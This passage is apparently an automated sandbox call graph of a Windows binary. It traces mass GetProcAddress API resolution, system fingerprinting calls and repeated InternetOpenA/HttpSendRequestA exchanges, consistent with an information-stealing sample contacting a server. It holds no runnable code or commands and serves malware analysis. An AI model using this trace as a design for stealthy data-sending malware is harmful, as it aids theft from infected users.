14282->14283 14284 be45c0 2 API calls 14283->14284 14285 be382f 14284->14285 14286 be45c0 2 API calls 14285->14286 14287 be3848 14286->14287 14288 be45c0 2 API calls 14287->14288 14289 be3861 14288->14289 14290 be45c0 2 API calls 14289->14290 14291 be387a 14290->14291 14292 be45c0 2 API calls 14291->14292 14293 be3893 14292->14293 14294 be45c0 2 API calls 14293->14294 14295 be38ac 14294->14295 14296 be45c0 2 API calls 14295->14296 14297 be38c5 14296->14297 14298 be45c0 2 API calls 14297->14298 14299 be38de 14298->14299 14300 be45c0 2 API calls 14299->14300 14301 be38f7 14300->14301 14302 be45c0 2 API calls 14301->14302 14303 be3910 14302->14303 14304 be45c0 2 API calls 14303->14304 14305 be3929 14304->14305 14306 be45c0 2 API calls 14305->14306 14307 be3942 14306->14307 14308 be45c0 2 API calls 14307->14308 14309 be395b 14308->14309 14310 be45c0 2 API calls 14309->14310 14311 be3974 14310->14311 14312 be45c0 2 API calls 14311->14312 14313 be398d 14312->14313 14314 be45c0 2 API calls 14313->14314 14315 be39a6 14314->14315 14316 be45c0 2 API calls 14315->14316 14317 be39bf 14316->14317 14318 be45c0 2 API calls 14317->14318 14319 be39d8 14318->14319 14320 be45c0 2 API calls 14319->14320 14321 be39f1 14320->14321 14322 be45c0 2 API calls 14321->14322 14323 be3a0a 14322->14323 14324 be45c0 2 API calls 14323->14324 14325 be3a23 14324->14325 14326 be45c0 2 API calls 14325->14326 14327 be3a3c 14326->14327 14328 be45c0 2 API calls 14327->14328 14329 be3a55 14328->14329 14330 be45c0 2 API calls 14329->14330 14331 be3a6e 14330->14331 14332 be45c0 2 API calls 14331->14332 14333 be3a87 14332->14333 14334 be45c0 2 API calls 14333->14334 14335 be3aa0 14334->14335 14336 be45c0 2 API calls 14335->14336 14337 be3ab9 14336->14337 14338 be45c0 2 API calls 14337->14338 14339 be3ad2 14338->14339 14340 be45c0 2 API calls 14339->14340 14341 be3aeb 14340->14341 14342 be45c0 2 API calls 14341->14342 14343 be3b04 14342->14343 14344 be45c0 2 API calls 14343->14344 14345 be3b1d 14344->14345 14346 be45c0 2 API calls 14345->14346 14347 be3b36 14346->14347 14348 be45c0 2 API calls 14347->14348 14349 be3b4f 14348->14349 14350 be45c0 2 API calls 14349->14350 14351 be3b68 14350->14351 14352 be45c0 2 API calls 14351->14352 14353 be3b81 14352->14353 14354 be45c0 2 API calls 14353->14354 14355 be3b9a 14354->14355 14356 be45c0 2 API calls 14355->14356 14357 be3bb3 14356->14357 14358 be45c0 2 API calls 14357->14358 14359 be3bcc 14358->14359 14360 be45c0 2 API calls 14359->14360 14361 be3be5 14360->14361 14362 be45c0 2 API calls 14361->14362 14363 be3bfe 14362->14363 14364 be45c0 2 API calls 14363->14364 14365 be3c17 14364->14365 14366 be45c0 2 API calls 14365->14366 14367 be3c30 14366->14367 14368 be45c0 2 API calls 14367->14368 14369 be3c49 14368->14369 14370 be45c0 2 API calls 14369->14370 14371 be3c62 14370->14371 14372 be45c0 2 API calls 14371->14372 14373 be3c7b 14372->14373 14374 be45c0 2 API calls 14373->14374 14375 be3c94 14374->14375 14376 be45c0 2 API calls 14375->14376 14377 be3cad 14376->14377 14378 be45c0 2 API calls 14377->14378 14379 be3cc6 14378->14379 14380 be45c0 2 API calls 14379->14380 14381 be3cdf 14380->14381 14382 be45c0 2 API calls 14381->14382 14383 be3cf8 14382->14383 14384 be45c0 2 API calls 14383->14384 14385 be3d11 14384->14385 14386 be45c0 2 API calls 14385->14386 14387 be3d2a 14386->14387 14388 be45c0 2 API calls 14387->14388 14389 be3d43 14388->14389 14390 be45c0 2 API calls 14389->14390 14391 be3d5c 14390->14391 14392 be45c0 2 API calls 14391->14392 14393 be3d75 14392->14393 14394 be45c0 2 API calls 14393->14394 14395 be3d8e 14394->14395 14396 be45c0 2 API calls 14395->14396 14397 be3da7 14396->14397 14398 be45c0 2 API calls 14397->14398 14399 be3dc0 14398->14399 14400 be45c0 2 API calls 14399->14400 14401 be3dd9 14400->14401 14402 be45c0 2 API calls 14401->14402 14403 be3df2 14402->14403 14404 be45c0 2 API calls 14403->14404 14405 be3e0b 14404->14405 14406 be45c0 2 API calls 14405->14406 14407 be3e24 14406->14407 14408 be45c0 2 API calls 14407->14408 14409 be3e3d 14408->14409 14410 be45c0 2 API calls 14409->14410 14411 be3e56 14410->14411 14412 be45c0 2 API calls 14411->14412 14413 be3e6f 14412->14413 14414 be45c0 2 API calls 14413->14414 14415 be3e88 14414->14415 14416 be45c0 2 API calls 14415->14416 14417 be3ea1 14416->14417 14418 be45c0 2 API calls 14417->14418 14419 be3eba 14418->14419 14420 be45c0 2 API calls 14419->14420 14421 be3ed3 14420->14421 14422 be45c0 2 API calls 14421->14422 14423 be3eec 14422->14423 14424 be45c0 2 API calls 14423->14424 14425 be3f05 14424->14425 14426 be45c0 2 API calls 14425->14426 14427 be3f1e 14426->14427 14428 be45c0 2 API calls 14427->14428 14429 be3f37 14428->14429 14430 be45c0 2 API calls 14429->14430 14431 be3f50 14430->14431 14432 be45c0 2 API calls 14431->14432 14433 be3f69 14432->14433 14434 be45c0 2 API calls 14433->14434 14435 be3f82 14434->14435 14436 be45c0 2 API calls 14435->14436 14437 be3f9b 14436->14437 14438 be45c0 2 API calls 14437->14438 14439 be3fb4 14438->14439 14440 be45c0 2 API calls 14439->14440 14441 be3fcd 14440->14441 14442 be45c0 2 API calls 14441->14442 14443 be3fe6 14442->14443 14444 be45c0 2 API calls 14443->14444 14445 be3fff 14444->14445 14446 be45c0 2 API calls 14445->14446 14447 be4018 14446->14447 14448 be45c0 2 API calls 14447->14448 14449 be4031 14448->14449 14450 be45c0 2 API calls 14449->14450 14451 be404a 14450->14451 14452 be45c0 2 API calls 14451->14452 14453 be4063 14452->14453 14454 be45c0 2 API calls 14453->14454 14455 be407c 14454->14455 14456 be45c0 2 API calls 14455->14456 14457 be4095 14456->14457 14458 be45c0 2 API calls 14457->14458 14459 be40ae 14458->14459 14460 be45c0 2 API calls 14459->14460 14461 be40c7 14460->14461 14462 be45c0 2 API calls 14461->14462 14463 be40e0 14462->14463 14464 be45c0 2 API calls 14463->14464 14465 be40f9 14464->14465 14466 be45c0 2 API calls 14465->14466 14467 be4112 14466->14467 14468 be45c0 2 API calls 14467->14468 14469 be412b 14468->14469 14470 be45c0 2 API calls 14469->14470 14471 be4144 14470->14471 14472 be45c0 2 API calls 14471->14472 14473 be415d 14472->14473 14474 be45c0 2 API calls 14473->14474 14475 be4176 14474->14475 14476 be45c0 2 API calls 14475->14476 14477 be418f 14476->14477 14478 be45c0 2 API calls 14477->14478 14479 be41a8 14478->14479 14480 be45c0 2 API calls 14479->14480 14481 be41c1 14480->14481 14482 be45c0 2 API calls 14481->14482 14483 be41da 14482->14483 14484 be45c0 2 API calls 14483->14484 14485 be41f3 14484->14485 14486 be45c0 2 API calls 14485->14486 14487 be420c 14486->14487 14488 be45c0 2 API calls 14487->14488 14489 be4225 14488->14489 14490 be45c0 2 API calls 14489->14490 14491 be423e 14490->14491 14492 be45c0 2 API calls 14491->14492 14493 be4257 14492->14493 14494 be45c0 2 API calls 14493->14494 14495 be4270 14494->14495 14496 be45c0 2 API calls 14495->14496 14497 be4289 14496->14497 14498 be45c0 2 API calls 14497->14498 14499 be42a2 14498->14499 14500 be45c0 2 API calls 14499->14500 14501 be42bb 14500->14501 14502 be45c0 2 API calls 14501->14502 14503 be42d4 14502->14503 14504 be45c0 2 API calls 14503->14504 14505 be42ed 14504->14505 14506 be45c0 2 API calls 14505->14506 14507 be4306 14506->14507 14508 be45c0 2 API calls 14507->14508 14509 be431f 14508->14509 14510 be45c0 2 API calls 14509->14510 14511 be4338 14510->14511 14512 be45c0 2 API calls 14511->14512 14513 be4351 14512->14513 14514 be45c0 2 API calls 14513->14514 14515 be436a 14514->14515 14516 be45c0 2 API calls 14515->14516 14517 be4383 14516->14517 14518 be45c0 2 API calls 14517->14518 14519 be439c 14518->14519 14520 be45c0 2 API calls 14519->14520 14521 be43b5 14520->14521 14522 be45c0 2 API calls 14521->14522 14523 be43ce 14522->14523 14524 be45c0 2 API calls 14523->14524 14525 be43e7 14524->14525 14526 be45c0 2 API calls 14525->14526 14527 be4400 14526->14527 14528 be45c0 2 API calls 14527->14528 14529 be4419 14528->14529 14530 be45c0 2 API calls 14529->14530 14531 be4432 14530->14531 14532 be45c0 2 API calls 14531->14532 14533 be444b 14532->14533 14534 be45c0 2 API calls 14533->14534 14535 be4464 14534->14535 14536 be45c0 2 API calls 14535->14536 14537 be447d 14536->14537 14538 be45c0 2 API calls 14537->14538 14539 be4496 14538->14539 14540 be45c0 2 API calls 14539->14540 14541 be44af 14540->14541 14542 be45c0 2 API calls 14541->14542 14543 be44c8 14542->14543 14544 be45c0 2 API calls 14543->14544 14545 be44e1 14544->14545 14546 be45c0 2 API calls 14545->14546 14547 be44fa 14546->14547 14548 be45c0 2 API calls 14547->14548 14549 be4513 14548->14549 14550 be45c0 2 API calls 14549->14550 14551 be452c 14550->14551 14552 be45c0 2 API calls 14551->14552 14553 be4545 14552->14553 14554 be45c0 2 API calls 14553->14554 14555 be455e 14554->14555 14556 be45c0 2 API calls 14555->14556 14557 be4577 14556->14557 14558 be45c0 2 API calls 14557->14558 14559 be4590 14558->14559 14560 be45c0 2 API calls 14559->14560 14561 be45a9 14560->14561 14562 bf9c10 14561->14562 14563 bfa036 8 API calls 14562->14563 14564 bf9c20 43 API calls 14562->14564 14565 bfa0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14563->14565 14566 bfa146 14563->14566 14564->14563 14565->14566 14567 bfa216 14566->14567 14568 bfa153 8 API calls 14566->14568 14569 bfa21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14567->14569 14570 bfa298 14567->14570 14568->14567 14569->14570 14571 bfa337 14570->14571 14572 bfa2a5 6 API calls 14570->14572 14573 bfa41f 14571->14573 14574 bfa344 9 API calls 14571->14574 14572->14571 14575 bfa428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14573->14575 14576 bfa4a2 14573->14576 14574->14573 14575->14576 14577 bfa4dc 14576->14577 14578 bfa4ab GetProcAddress GetProcAddress 14576->14578 14579 bfa515 14577->14579 14580 bfa4e5 GetProcAddress GetProcAddress 14577->14580 14578->14577 14581 bfa612 14579->14581 14582 bfa522 10 API calls 14579->14582 14580->14579 14583 bfa67d 14581->14583 14584 bfa61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14581->14584 14582->14581 14585 bfa69e 14583->14585 14586 bfa686 GetProcAddress 14583->14586 14584->14583 14587 bf5ca3 14585->14587 14588 bfa6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14585->14588 14586->14585 14589 be1590 14587->14589 14588->14587 15710 be1670 14589->15710 14592 bfa7a0 lstrcpy 14593 be15b5 14592->14593 14594 bfa7a0 lstrcpy 14593->14594 14595 be15c7 14594->14595 14596 bfa7a0 lstrcpy 14595->14596 14597 be15d9 14596->14597 14598 bfa7a0 lstrcpy 14597->14598 14599 be1663 14598->14599 14600 bf5510 14599->14600 14601 bf5521 14600->14601 14602 bfa820 2 API calls 14601->14602 14603 bf552e 14602->14603 14604 bfa820 2 API calls 14603->14604 14605 bf553b 14604->14605 14606 bfa820 2 API calls 14605->14606 14607 bf5548 14606->14607 14608 bfa740 lstrcpy 14607->14608 14609 bf5555 14608->14609 14610 bfa740 lstrcpy 14609->14610 14611 bf5562 14610->14611 14612 bfa740 lstrcpy 14611->14612 14613 bf556f 14612->14613 14614 bfa740 lstrcpy 14613->14614 14633 bf557c 14614->14633 14615 be1590 lstrcpy 14615->14633 14616 bf52c0 25 API calls 14616->14633 14617 bf5643 StrCmpCA 14617->14633 14618 bf56a0 StrCmpCA 14619 bf57dc 14618->14619 14618->14633 14620 bfa8a0 lstrcpy 14619->14620 14621 bf57e8 14620->14621 14623 bfa820 2 API calls 14621->14623 14622 bfa820 lstrlen lstrcpy 14622->14633 14624 bf57f6 14623->14624 14627 bfa820 2 API calls 14624->14627 14625 bf5856 StrCmpCA 14626 bf5991 14625->14626 14625->14633 14628 bfa8a0 lstrcpy 14626->14628 14629 bf5805 14627->14629 14630 bf599d 14628->14630 14631 be1670 lstrcpy 14629->14631 14634 bfa820 2 API calls 14630->14634 14652 bf5811 14631->14652 14632 bfa740 lstrcpy 14632->14633 14633->14615 14633->14616 14633->14617 14633->14618 14633->14622 14633->14625 14633->14632 14635 bf5a0b StrCmpCA 14633->14635 14648 bf578a StrCmpCA 14633->14648 14650 bf593f StrCmpCA 14633->14650 14651 bfa7a0 lstrcpy 14633->14651 14653 bf51f0 20 API calls 14633->14653 14654 bfa8a0 lstrcpy 14633->14654 14636 bf59ab 14634->14636 14637 bf5a28 14635->14637 14638 bf5a16 Sleep 14635->14638 14639 bfa820 2 API calls 14636->14639 14640 bfa8a0 lstrcpy 14637->14640 14638->14633 14641 bf59ba 14639->14641 14643 bf5a34 14640->14643 14642 be1670 lstrcpy 14641->14642 14642->14652 14644 bfa820 2 API calls 14643->14644 14645 bf5a43 14644->14645 14646 bfa820 2 API calls 14645->14646 14647 bf5a52 14646->14647 14649 be1670 lstrcpy 14647->14649 14648->14633 14649->14652 14650->14633 14651->14633 14652->13707 14653->14633 14654->14633 14656 bf754c 14655->14656 14657 bf7553 GetVolumeInformationA 14655->14657 14656->14657 14658 bf7591 14657->14658 14659 bf75fc GetProcessHeap RtlAllocateHeap 14658->14659 14660 bf7619 14659->14660 14661 bf7628 wsprintfA 14659->14661 14663 bfa740 lstrcpy 14660->14663 14662 bfa740 lstrcpy 14661->14662 14664 bf5da7 14662->14664 14663->14664 14664->13728 14666 bfa7a0 lstrcpy 14665->14666 14667 be4899 14666->14667 15719 be47b0 14667->15719 14669 be48a5 14670 bfa740 lstrcpy 14669->14670 14671 be48d7 14670->14671 14672 bfa740 lstrcpy 14671->14672 14673 be48e4 14672->14673 14674 bfa740 lstrcpy 14673->14674 14675 be48f1 14674->14675 14676 bfa740 lstrcpy 14675->14676 14677 be48fe 14676->14677 14678 bfa740 lstrcpy 14677->14678 14679 be490b InternetOpenA StrCmpCA 14678->14679 14680 be4944 14679->14680 14681 be4ecb InternetCloseHandle 14680->14681 15725 bf8b60 14680->15725 14683 be4ee8 14681->14683 15740 be9ac0 CryptStringToBinaryA 14683->15740 14684 be4963 15733 bfa920 14684->15733 14687 be4976 14689 bfa8a0 lstrcpy 14687->14689 14694 be497f 14689->14694 14690 bfa820 2 API calls 14691 be4f05 14690->14691 14693 bfa9b0 4 API calls 14691->14693 14692 be4f27 ctype 14697 bfa7a0 lstrcpy 14692->14697 14695 be4f1b 14693->14695 14698 bfa9b0 4 API calls 14694->14698 14696 bfa8a0 lstrcpy 14695->14696 14696->14692 14709 be4f57 14697->14709 14699 be49a9 14698->14699 14700 bfa8a0 lstrcpy 14699->14700 14701 be49b2 14700->14701 14702 bfa9b0 4 API calls 14701->14702 14703 be49d1 14702->14703 14704 bfa8a0 lstrcpy 14703->14704 14705 be49da 14704->14705 14706 bfa920 3 API calls 14705->14706 14707 be49f8 14706->14707 14708 bfa8a0 lstrcpy 14707->14708 14710 be4a01 14708->14710 14709->13731 14711 bfa9b0 4 API calls 14710->14711 14712 be4a20 14711->14712 14713 bfa8a0 lstrcpy 14712->14713 14714 be4a29 14713->14714 14715 bfa9b0 4 API calls 14714->14715 14716 be4a48 14715->14716 14717 bfa8a0 lstrcpy 14716->14717 14718 be4a51 14717->14718 14719 bfa9b0 4 API calls 14718->14719 14720 be4a7d 14719->14720 14721 bfa920 3 API calls 14720->14721 14722 be4a84 14721->14722 14723 bfa8a0 lstrcpy 14722->14723 14724 be4a8d 14723->14724 14725 be4aa3 InternetConnectA 14724->14725 14725->14681 14726 be4ad3 HttpOpenRequestA 14725->14726 14728 be4ebe InternetCloseHandle 14726->14728 14729 be4b28 14726->14729 14728->14681 14730 bfa9b0 4 API calls 14729->14730 14731 be4b3c 14730->14731 14732 bfa8a0 lstrcpy 14731->14732 14733 be4b45 14732->14733 14734 bfa920 3 API calls 14733->14734 14735 be4b63 14734->14735 14736 bfa8a0 lstrcpy 14735->14736 14737 be4b6c 14736->14737 14738 bfa9b0 4 API calls 14737->14738 14739 be4b8b 14738->14739 14740 bfa8a0 lstrcpy 14739->14740 14741 be4b94 14740->14741 14742 bfa9b0 4 API calls 14741->14742 14743 be4bb5 14742->14743 14744 bfa8a0 lstrcpy 14743->14744 14745 be4bbe 14744->14745 14746 bfa9b0 4 API calls 14745->14746 14747 be4bde 14746->14747 14748 bfa8a0 lstrcpy 14747->14748 14749 be4be7 14748->14749 14750 bfa9b0 4 API calls 14749->14750 14751 be4c06 14750->14751 14752 bfa8a0 lstrcpy 14751->14752 14753 be4c0f 14752->14753 14754 bfa920 3 API calls 14753->14754 14755 be4c2d 14754->14755 14756 bfa8a0 lstrcpy 14755->14756 14757 be4c36 14756->14757 14758 bfa9b0 4 API calls 14757->14758 14759 be4c55 14758->14759 14760 bfa8a0 lstrcpy 14759->14760 14761 be4c5e 14760->14761 14762 bfa9b0 4 API calls 14761->14762 14763 be4c7d 14762->14763 14764 bfa8a0 lstrcpy 14763->14764 14765 be4c86 14764->14765 14766 bfa920 3 API calls 14765->14766 14767 be4ca4 14766->14767 14768 bfa8a0 lstrcpy 14767->14768 14769 be4cad 14768->14769 14770 bfa9b0 4 API calls 14769->14770 14771 be4ccc 14770->14771 14772 bfa8a0 lstrcpy 14771->14772 14773 be4cd5 14772->14773 14774 bfa9b0 4 API calls 14773->14774 14775 be4cf6 14774->14775 14776 bfa8a0 lstrcpy 14775->14776 14777 be4cff 14776->14777 14778 bfa9b0 4 API calls 14777->14778 14779 be4d1f 14778->14779 14780 bfa8a0 lstrcpy 14779->14780 14781 be4d28 14780->14781 14782 bfa9b0 4 API calls 14781->14782 14783 be4d47 14782->14783 14784 bfa8a0 lstrcpy 14783->14784 14785 be4d50 14784->14785 14786 bfa920 3 API calls 14785->14786 14787 be4d6e 14786->14787 14788 bfa8a0 lstrcpy 14787->14788 14789 be4d77 14788->14789 14790 bfa740 lstrcpy 14789->14790 14791 be4d92 14790->14791 14792 bfa920 3 API calls 14791->14792 14793 be4db3 14792->14793 14794 bfa920 3 API calls 14793->14794 14795 be4dba 14794->14795 14796 bfa8a0 lstrcpy 14795->14796 14797 be4dc6 14796->14797 14798 be4de7 lstrlen 14797->14798 14799 be4dfa 14798->14799 14800 be4e03 lstrlen 14799->14800 15739 bfaad0 14800->15739 14802 be4e13 HttpSendRequestA 14803 be4e32 InternetReadFile 14802->14803 14804 be4e67 InternetCloseHandle 14803->14804 14809 be4e5e 14803->14809 14806 bfa800 14804->14806 14806->14728 14807 bfa9b0 4 API calls 14807->14809 14808 bfa8a0 lstrcpy 14808->14809 14809->14803 14809->14804 14809->14807 14809->14808 15746 bfaad0 14810->15746 14812 bf17c4 StrCmpCA 14813 bf17cf ExitProcess 14812->14813 14817 bf17d7 14812->14817 14814 bf19c2 14814->13733 14815 bf187f StrCmpCA 14815->14817 14816 bf185d StrCmpCA 14816->14817 14817->14814 14817->14815 14817->14816 14818 bf1913 StrCmpCA 14817->14818 14819 bf1932 StrCmpCA 14817->14819 14820 bf18f1 StrCmpCA 14817->14820 14821 bf1951 StrCmpCA 14817->14821 14822 bf1970 StrCmpCA 14817->14822 14823 bf18cf StrCmpCA 14817->14823 14824 bf18ad StrCmpCA 14817->14824 14825 bfa820 lstrlen lstrcpy 14817->14825 14818->14817 14819->14817 14820->14817 14821->14817 14822->14817 14823->14817 14824->14817 14825->14817 14827 bfa7a0 lstrcpy 14826->14827 14828 be5979 14827->14828 14829 be47b0 2 API calls 14828->14829 14830 be5985 14829->14830 14831 bfa740 lstrcpy 14830->14831 14832 be59ba 14831->14832 14833 bfa740 lstrcpy 14832->14833 14834 be59c7 14833->14834 14835 bfa740 lstrcpy 14834->14835 14836 be59d4 14835->14836 14837 bfa740 lstrcpy 14836->14837 14838 be59e1 14837->14838 14839 bfa740 lstrcpy 14838->14839 14840 be59ee InternetOpenA StrCmpCA 14839->14840 14841 be5a1d 14840->14841 14842 be5fc3 InternetCloseHandle 14841->14842 14843 bf8b60 3 API calls 14841->14843 14844 be5fe0 14842->14844 14845 be5a3c 14843->14845 14847 be9ac0 4 API calls 14844->14847 14846 bfa920 3 API calls 14845->14846 14848 be5a4f 14846->14848 14849 be5fe6 14847->14849 14850 bfa8a0 lstrcpy 14848->14850 14851 bfa820 2 API calls 14849->14851 14853 be601f ctype 14849->14853 14855 be5a58 14850->14855 14852 be5ffd 14851->14852 14854 bfa9b0 4 API calls 14852->14854 14857 bfa7a0 lstrcpy 14853->14857 14856 be6013 14854->14856 14859 bfa9b0 4 API calls 14855->14859 14858 bfa8a0 lstrcpy 14856->14858 14867 be604f 14857->14867 14858->14853 14860 be5a82 14859->14860 14861 bfa8a0 lstrcpy 14860->14861 14862 be5a8b 14861->14862 14863 bfa9b0 4 API calls 14862->14863 14864 be5aaa 14863->14864 14865 bfa8a0 lstrcpy 14864->14865 14866 be5ab3 14865->14866 14868 bfa920 3 API calls 14866->14868 14867->13739 14869 be5ad1 14868->14869 14870 bfa8a0 lstrcpy 14869->14870 14871 be5ada 14870->14871 14872 bfa9b0 4 API calls 14871->14872 14873 be5af9 14872->14873 14874 bfa8a0 lstrcpy 14873->14874 14875 be5b02 14874->14875 14876 bfa9b0 4 API calls 14875->14876 14877 be5b21 14876->14877 14878 bfa8a0 lstrcpy 14877->14878 14879 be5b2a 14878->14879 14880 bfa9b0 4 API calls 14879->14880 14881 be5b56 14880->14881 14882 bfa920 3 API calls 14881->14882 14883 be5b5d 14882->14883 14884 bfa8a0 lstrcpy 14883->14884 14885 be5b66 14884->14885 14886 be5b7c InternetConnectA 14885->14886 14886->14842 14887 be5bac HttpOpenRequestA 14886->14887 14889 be5c0b 14887->14889 14890 be5fb6 InternetCloseHandle 14887->14890 14891 bfa9b0 4 API calls 14889->14891 14890->14842 14892 be5c1f 14891->14892 14893 bfa8a0 lstrcpy 14892->14893 14894 be5c28 14893->14894 14895 bfa920 3 API calls 14894->14895 14896 be5c46 14895->14896 14897 bfa8a0 lstrcpy 14896->14897 14898 be5c4f 14897->14898 14899 bfa9b0 4 API calls 14898->14899 14900 be5c6e 14899->14900 14901 bfa8a0 lstrcpy 14900->14901 14902 be5c77 14901->14902 14903 bfa9b0 4 API calls 14902->14903 14904 be5c98 14903->14904 14905 bfa8a0 lstrcpy 14904->14905 14906 be5ca1 14905->14906 14907 bfa9b0 4 API calls 14906->14907 14908 be5cc1 14907->14908 14909 bfa8a0 lstrcpy 14908->14909 14910 be5cca 14909->14910 14911 bfa9b0 4 API calls 14910->14911 14912 be5ce9 14911->14912 14913 bfa8a0 lstrcpy 14912->14913 14914 be5cf2 14913->14914 14915 bfa920 3 API calls 14914->14915 14916 be5d10 14915->14916 14917 bfa8a0 lstrcpy 14916->14917 14918 be5d19 14917->14918 14919 bfa9b0 4 API calls 14918->14919 14920 be5d38 14919->14920 14921 bfa8a0 lstrcpy 14920->14921 14922 be5d41 14921->14922 14923 bfa9b0 4 API calls 14922->14923 14924 be5d60 14923->14924 14925 bfa8a0 lstrcpy 14924->14925 14926 be5d69 14925->14926 14927 bfa920 3 API calls 14926->14927 14928 be5d87 14927->14928 14929 bfa8a0 lstrcpy 14928->14929 14930 be5d90 14929->14930 14931 bfa9b0 4 API calls 14930->14931 14932 be5daf 14931->14932 14933 bfa8a0 lstrcpy 14932->14933 14934 be5db8 14933->14934 14935 bfa9b0 4 API calls 14934->14935 14936 be5dd9 14935->14936 14937 bfa8a0 lstrcpy 14936->14937 14938 be5de2 14937->14938 14939 bfa9b0 4 API calls 14938->14939 14940 be5e02 14939->14940 14941 bfa8a0 lstrcpy 14940->14941 14942 be5e0b 14941->14942 14943 bfa9b0 4 API calls 14942->14943 14944 be5e2a 14943->14944 14945 bfa8a0 lstrcpy 14944->14945 14946 be5e33 14945->14946 14947 bfa920 3 API calls 14946->14947 14948 be5e54 14947->14948 14949 bfa8a0 lstrcpy 14948->14949 14950 be5e5d 14949->14950 14951 be5e70 lstrlen 14950->14951 15747 bfaad0 14951->15747 14953 be5e81 lstrlen GetProcessHeap RtlAllocateHeap 15748 bfaad0 14953->15748 14955 be5eae lstrlen 14956 be5ebe 14955->14956 14957 be5ed7 lstrlen 14956->14957 14958 be5ee7 14957->14958 14959 be5ef0 lstrlen 14958->14959 14960 be5f04 14959->14960 14961 be5f1a lstrlen 14960->14961 15749 bfaad0 14961->15749 14963 be5f2a HttpSendRequestA 14964 be5f35 InternetReadFile 14963->14964 14965 be5f6a InternetCloseHandle 14964->14965 14969 be5f61 14964->14969 14965->14890 14967 bfa9b0 4 API calls 14967->14969 14968 bfa8a0 lstrcpy 14968->14969 14969->14964 14969->14965 14969->14967 14969->14968 14972 bf1077 14970->14972 14971 bf1151 14971->13741 14972->14971 14973 bfa820 lstrlen lstrcpy 14972->14973 14973->14972 14979 bf0db7 14974->14979 14975 bf0f17 14975->13749 14976 bf0e27 StrCmpCA 14976->14979 14977 bf0e67 StrCmpCA 14977->14979 14978 bf0ea4 StrCmpCA 14978->14979 14979->14975 14979->14976 14979->14977 14979->14978 14980 bfa820 lstrlen lstrcpy 14979->14980 14980->14979 14982 bf0f67 14981->14982 14983 bf0fb2 StrCmpCA 14982->14983 14984 bf1044 14982->14984 14985 bfa820 lstrlen lstrcpy 14982->14985 14983->14982 14984->13757 14985->14982 14987 bfa740 lstrcpy 14986->14987 14988 bf1a26 14987->14988 14989 bfa9b0 4 API calls 14988->14989 14990 bf1a37 14989->14990 14991 bfa8a0 lstrcpy 14990->14991 14992 bf1a40 14991->14992 14993 bfa9b0 4 API calls 14992->14993 14994 bf1a5b 14993->14994 14995 bfa8a0 lstrcpy 14994->14995 14996 bf1a64 14995->14996 14997 bfa9b0 4 API calls 14996->14997 14998 bf1a7d 14997->14998 14999 bfa8a0 lstrcpy 14998->14999 15000 bf1a86 14999->15000 15001 bfa9b0 4 API calls 15000->15001 15002 bf1aa1 15001->15002 15003 bfa8a0 lstrcpy 15002->15003 15004 bf1aaa 15003->15004 15005 bfa9b0 4 API calls 15004->15005 15006 bf1ac3 15005->15006 15007 bfa8a0 lstrcpy 15006->15007 15008 bf1acc 15007->15008 15009 bfa9b0 4 API calls 15008->15009 15010 bf1ae7 15009->15010 15011 bfa8a0 lstrcpy 15010->15011 15012 bf1af0 15011->15012 15013 bfa9b0 4 API calls 15012->15013 15014 bf1b09 15013->15014 15015 bfa8a0 lstrcpy 15014->15015 15016 bf1b12 15015->15016 15017 bfa9b0 4 API calls 15016->15017 15018 bf1b2d 15017->15018 15019 bfa8a0 lstrcpy 15018->15019 15020 bf1b36 15019->15020 15021 bfa9b0 4 API calls 15020->15021 15022 bf1b4f 15021->15022 15023 bfa8a0 lstrcpy 15022->15023 15024 bf1b58 15023->15024 15025 bfa9b0 4 API calls 15024->15025 15026 bf1b76 15025->15026 15027 bfa8a0 lstrcpy 15026->15027 15028 bf1b7f 15027->15028 15029 bf7500 6 API calls 15028->15029 15030 bf1b96 15029->15030 15031 bfa920 3 API calls 15030->15031 15032 bf1ba9 15031->15032 15033 bfa8a0 lstrcpy 15032->15033 15034 bf1bb2 15033->15034 15035 bfa9b0 4 API calls 15034->15035 15036 bf1bdc 15035->15036 15037 bfa8a0 lstrcpy 15036->15037 15038 bf1be5 15037->15038 15039 bfa9b0 4 API calls 15038->15039 15040 bf1c05 15039->15040 15041 bfa8a0 lstrcpy 15040->15041 15042 bf1c0e 15041->15042 15750 bf7690 GetProcessHeap RtlAllocateHeap 15042->15750 15045 bfa9b0 4 API calls 15046 bf1c2e 15045->15046 15047 bfa8a0 lstrcpy 15046->15047 15048 bf1c37 15047->15048 15049 bfa9b0 4 API calls 15048->15049 15050 bf1c56 15049->15050 15051 bfa8a0 lstrcpy 15050->15051 15052 bf1c5f 15051->15052 15053 bfa9b0 4 API calls 15052->15053 15054 bf1c80 15053->15054 15055 bfa8a0 lstrcpy 15054->15055 15056 bf1c89 15055->15056 15757 bf77c0 GetCurrentProcess IsWow64Process 15056->15757 15059 bfa9b0 4 API calls 15060 bf1ca9 15059->15060 15061 bfa8a0 lstrcpy 15060->15061 15062 bf1cb2 15061->15062 15063 bfa9b0 4 API calls 15062->15063 15064 bf1cd1 15063->15064 15065 bfa8a0 lstrcpy 15064->15065 15066 bf1cda 15065->15066 15067 bfa9b0 4 API calls 15066->15067 15068 bf1cfb 15067->15068 15069 bfa8a0 lstrcpy 15068->15069 15070 bf1d04 15069->15070 15071 bf7850 3 API calls 15070->15071 15072 bf1d14 15071->15072 15073 bfa9b0 4 API calls 15072->15073 15074 bf1d24 15073->15074 15075 bfa8a0 lstrcpy 15074->15075 15076 bf1d2d 15075->15076 15077 bfa9b0 4 API calls 15076->15077 15078 bf1d4c 15077->15078 15079 bfa8a0 lstrcpy 15078->15079 15080 bf1d55 15079->15080 15081 bfa9b0 4 API calls 15080->15081 15082 bf1d75 15081->15082 15083 bfa8a0 lstrcpy 15082->15083 15084 bf1d7e 15083->15084 15085 bf78e0 3 API calls 15084->15085 15086 bf1d8e 15085->15086 15087 bfa9b0 4 API calls 15086->15087 15088 bf1d9e 15087->15088 15089 bfa8a0 lstrcpy 15088->15089 15090 bf1da7 15089->15090 15091 bfa9b0 4 API calls 15090->15091 15092 bf1dc6 15091->15092 15093 bfa8a0 lstrcpy 15092->15093 15094 bf1dcf 15093->15094 15095 bfa9b0 4 API calls 15094->15095 15096 bf1df0 15095->15096 15097 bfa8a0 lstrcpy 15096->15097 15098 bf1df9 15097->15098 15759 bf7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15098->15759 15101 